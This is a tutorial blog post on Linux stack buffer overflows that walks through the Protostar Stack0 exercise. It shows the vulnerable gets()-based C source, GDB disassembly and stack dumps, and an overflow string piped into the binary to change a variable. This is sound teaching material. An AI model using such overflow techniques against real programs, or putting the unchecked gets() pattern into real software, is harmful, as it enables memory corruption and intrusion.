Introduction
In this post, we will dive into the basics of Linux exploitation. To understand the basics of Linux exploitation, we will be looking at the first form: Stack buffer overflows. We will start by learning memory corruption, which will give us a good understanding of how memory is treated in Linux, and from there we will gradually make our way into developing a complete exploit.
Setup
Protostar’s exploit exercises VM ( https://exploit-exercises.lains.space/protostar/ ) is a great resource that will help us on our journey, along with OverTheWire’s Narnia wargame.
So grab an iso from Protostar, and set it up in your desired virtual machine manager. I will be using VirtualBox as always. We will use ssh to log into this VM ( use hostname –I to get the local IP of the VM). The default credentials for Protostar are user:user.
Tools
For Linux, the choice of debuggers isn’t as varied as Windows. Throughout our journey, we will be mainly using GDB (GNU Debugger), the default debugger that comes with Linux. You can alternatively use EDB.
As we progress, we will see how we can pimp GDB up to do all sorts of cool tricks, and develop exploits with ease (spoiler alert: gdb-peda 😉).
Static Code Analysis
To see the source code of the challenge, we have to navigate to the exploit exercises website, where the source code for all challenges is given. We will be starting with the Stack0 challenge, that focuses on memory corruption. Take a look at the code below:
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
int main(int argc, char **argv)
{
volatile int modified;
char buffer[64];
modified = 0;
gets(buffer);
if(modified != 0) {
printf("you have changed the 'modified' variable\n");
} else {
printf("Try again?\n");
}
}
The includes are just importing usual C libraries. Stdlib.h is a general-purpose standard library that helps with memory allocation, process control, etc.
Unistd.h is a header file that provides access to the POSIX OS API. Similar to the standard library.
Stdio.h is the standard input/output header file that manages I/O operations.
The main function initializes two variables: buffer, that takes 64 characters, and modified, which is a volatile integer. This means that the variable modified can take multiple values. The main function also takes one user-supplied argument.
int main(int argc, char **argv)
{
volatile int modified;
char buffer[64];
modified
is initially set to 0, and the line below that is responsible for reading the characters in buffer from our input, and printing it on to the screen. The function that does this is gets()
.
modified = 0;
gets(buffer);
Now here is where our vulnerability lies, in the gets() function. The problem with gets() is, if we enter a string that is longer than 64 bytes, gets() does not do any check on the size whatsoever, so it will keep reading our input from the stack until it finds a new line. Which means, our string will OVERFLOW outside the given buffer of 64 bytes, and start to overwrite other variables, until our string ends.
In this case, we need to change the value of the modified variable, that is located somewhere on the stack. The if else conditions tell us that we succeed once we change the value of the modified variable from 0 to anything (I.e. not equal to (!=) 0).
if(modified != 0) {
printf("you have changed the 'modified' variable\n");
} else {
printf("Try again?\n");
}
Alrighty then! Now that we have analyzed the code completely, let us start debugging the binary in order to understand where our variables lie on the stack, and how our input affects it. I will be using GDB to debug the binary.
So first, fire up the Protostar VM, and use the command hostname -I
to display the local IP address of the VM. I suggest that you use a Bridged Adapter while setting up the VM, and set the adapter to the current interface that’s being used. That way, the VM will be on your network and you can easily ssh into it. Binaries are located in /opt/protostar/bin/
.
Debugging
To open the binary in GDB, we will use the command $ gdb stack0
, followed by the command disas main
inside gdb, which will disassemble the main function for us. What you see is a representation of the binary in assembly.
0x080483f4 <main+0>: push %ebp
0x080483f5 <main+1>: mov %esp,%ebp
0x080483f7 <main+3>: and $0xfffffff0,%esp
0x080483fa <main+6>: sub $0x60,%esp
0x080483fd <main+9>: movl $0x0,0x5c(%esp)
0x08048405 <main+17>: lea 0x1c(%esp),%eax
0x08048409 <main+21>: mov %eax,(%esp)
0x0804840c <main+24>: call 0x804830c <gets@plt>
0x08048411 <main+29>: mov 0x5c(%esp),%eax
0x08048415 <main+33>: test %eax,%eax
0x08048417 <main+35>: je 0x8048427 <main+51>
0x08048419 <main+37>: movl $0x8048500,(%esp)
0x08048420 <main+44>: call 0x804832c <puts@plt>
0x08048425 <main+49>: jmp 0x8048433 <main+63>
0x08048427 <main+51>: movl $0x8048529,(%esp)
0x0804842e <main+58>: call 0x804832c <puts@plt>
0x08048433 <main+63>: leave
0x08048434 <main+64>: ret
So right off the bat, even if you don’t understand assembly too well, you can see the call
instruction, calling the function gets()
at the address 0x0804840c
. This will come in handy during testing.
So a few things before we continue:
- ESP is our stack pointer. This points to the start/top of the stack.
- PUSH is an instruction which pushes a value stored in a particular register to the top of the stack.
- JMP is an instruction which will jump to a particular address to continue execution flow. JE is “jump if equal to”, which means that after the comparison (the test instruction), if the condition is satisfied, it will jump to said location. This represents the “if-else” iteration in our code.
Our objective here is to change the value of the modified
variable from 0 to anything else. Modified is somewhere on the stack, and in order to overwrite it with our desired value, we will have to overflow a section of the stack that lies before this variable in order to reach it.
There is one line in the disassembly that is particularly interesting though. It moves the value of 0 (hex 0x0) to the location esp + 0x5c
.
This tells us the location of the modified variable on the stack. Now, we will use the previous call instruction, and this one to set our breakpoints. A breakpoint is a pause in the execution flow of the binary, which will help us in understanding how values on the stack change after a particular instruction is executed.
We will do this by executing:
(gdb) break *0x0804840c
Breakpoint 1 at 0x804840c: file stack0/stack0.c, line 11.
(gdb) break *0x08048411
Breakpoint 2 at 0x8048411: file stack0/stack0.c, line 13.
(gdb)
This will stop the execution flow before the call to gets()
is made, and after that, before the value of modified
is transferred to the accumulator (eax) for comparison. Now, let’s run the binary by executing r
.
(gdb) r
Starting program: /opt/protostar/bin/stack0
Breakpoint 1, 0x0804840c in main (argc=1, argv=0xbffffd54) at stack0/stack0.c:11
So we hit our first breakpoint, right before the call to gets()
. If we run i r
, it will give us further information on the registers at this point of time.
(gdb) i r
eax 0xbffffc5c -1073742756
ecx 0x644d8780 1682802560
edx 0x1 1
ebx 0xb7fd7ff4 -1208123404
esp 0xbffffc40 0xbffffc40
ebp 0xbffffca8 0xbffffca8
esi 0x0 0
edi 0x0 0
eip 0x804840c 0x804840c <main+24>
eflags 0x200282 [ SF IF ID ]
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51
We can see that the address of the call instruction is in the EIP register. EIP holds the address to the next instruction which is to be executed. Now, let’s take a look at what the stack looks like right now by executing x/30wx $esp
.This will print 32 hexadecimal words off the stack. 30 has just been taken for simplicity purposes.
(gdb) x/32wx $esp
0xbffffc40: 0xbffffc5c 0x00000001 0xb7fff8f8 0xb7f0186e
0xbffffc50: 0xb7fd7ff4 0xb7ec6165 0xbffffc68 0xb7eada75
0xbffffc60: 0xb7fd7ff4 0x08049620 0xbffffc78 0x080482e8
0xbffffc70: 0xb7ff1040 0x08049620 0xbffffca8 0x08048469
0xbffffc80: 0xb7fd8304 0xb7fd7ff4 0x08048450 0xbffffca8
0xbffffc90: 0xb7ec6365 0xb7ff1040 0x0804845b 0x00000000
0xbffffca0: 0x08048450 0x00000000 0xbffffd28 0xb7eadc76
0xbffffcb0: 0x00000001 0xbffffd54 0xbffffd5c 0xb7fe1848
We can use this to find the location of the modified
variable. To find the address, we execute x/wx $esp+0x5c
, as we know from earlier that the variable is stored at the location $esp+0x5c or 0x5c(%esp)
. x/wx
stands for ‘examine’, so this will give us the address and the contents of modified
.
(gdb) x/wx $esp+0x5c
0xbffffc9c: 0x00000000
From this, we can see that the address of modified
on the stack is 0xbffffc9c
, and it contains 0. So if we correspond this with our stack print from earlier, this is where modified
is:
These are contents
|---------------------|---------------------|
| |
0xbffffc90: 0xb7ec6365 0xb7ff1040 0x0804845b 0x00000000 <---- modified
Addresses: 0xbffffc90 0xbffffc94 0xbffffc98 0xbffffc9c
Each address here is 4 bytes long, so the contents of c90
is given after the colon. If we add 4 bytes after c90
three times until we reach 0x0000000
, we get the address as c9c
. This is how the math works out in GDB.
Now, let’s continue execution flow by executing c
. Then, let’s just enter a few A’s just as a test. That way, we will know the location of our buffer on the stack.
(gdb) c
Continuing.
AAAAAAAAAAAAAAAAAAAAAAAAAAAA
Breakpoint 2, main (argc=1, argv=0xbffffd54) at stack0/stack0.c:13
13 in stack0/stack0.c
We hit our second breakpoint, which is right before the binary moves the value of modified
to EAX for the comparison (The if-else
iteration). Now, let’s take a look at the stack:
(gdb) x/32wx $esp
0xbffffc40: 0xbffffc5c 0x00000001 0xb7fff8f8 0xb7f0186e
0xbffffc50: 0xb7fd7ff4 0xb7ec6165 0xbffffc68 0x41414141
0xbffffc60: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffffc70: 0x41414141 0x41414141 0xbffffc00 0x08048469
0xbffffc80: 0xb7fd8304 0xb7fd7ff4 0x08048450 0xbffffca8
0xbffffc90: 0xb7ec6365 0xb7ff1040 0x0804845b 0x00000000 <-----
0xbffffca0: 0x08048450 0x00000000 0xbffffd28 0xb7eadc76
0xbffffcb0: 0x00000001 0xbffffd54 0xbffffd5c 0xb7fe1848
So the hexadecimal value of A is 0x41. We can see our A’s starting at 0xbffffc60
. This suggests that our buffer starts at this address. We can also see that we still have not reached the modified
variable, which is why we haven’t been able to overwrite the value. Remember the size of our buffer? 64. If we enter about 80 A’s, we may be able overflow the modified variable and change it’s value. Let’s give this a shot:
(gdb) r
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /opt/protostar/bin/stack0
Breakpoint 1, 0x0804840c in main (argc=1, argv=0xbffffd54) at stack0/stack0.c:11
11 in stack0/stack0.c
(gdb) c
Continuing.
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Breakpoint 2, main (argc=1, argv=0xbffffd54) at stack0/stack0.c:13
13 in stack0/stack0.c
(gdb) x/32wx $esp
0xbffffc40: 0xbffffc5c 0x00000001 0xb7fff8f8 0xb7f0186e
0xbffffc50: 0xb7fd7ff4 0xb7ec6165 0xbffffc68 0x41414141
0xbffffc60: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffffc70: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffffc80: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffffc90: 0x41414141 0x41414141 0x41414141 0x41414141 <----
0xbffffca0: 0x41414141 0x41414141 0x41414141 0xb7eadc00
0xbffffcb0: 0x00000001 0xbffffd54 0xbffffd5c 0xb7fe1848
Et voila! We have overwritten the value of the modified
variable, and also overwritten variables after that with out A’s. Let’s do this outside of GDB now:
$ echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA | ./stack0
you have changed the 'modified' variable
Segmentation fault
We have completed our first memory corruption exercise! This lays the foundation for stack buffer overflows, so if you’ve made it this far give yourself a good pat on the back! That’s all for now! I’ll see you in the next post!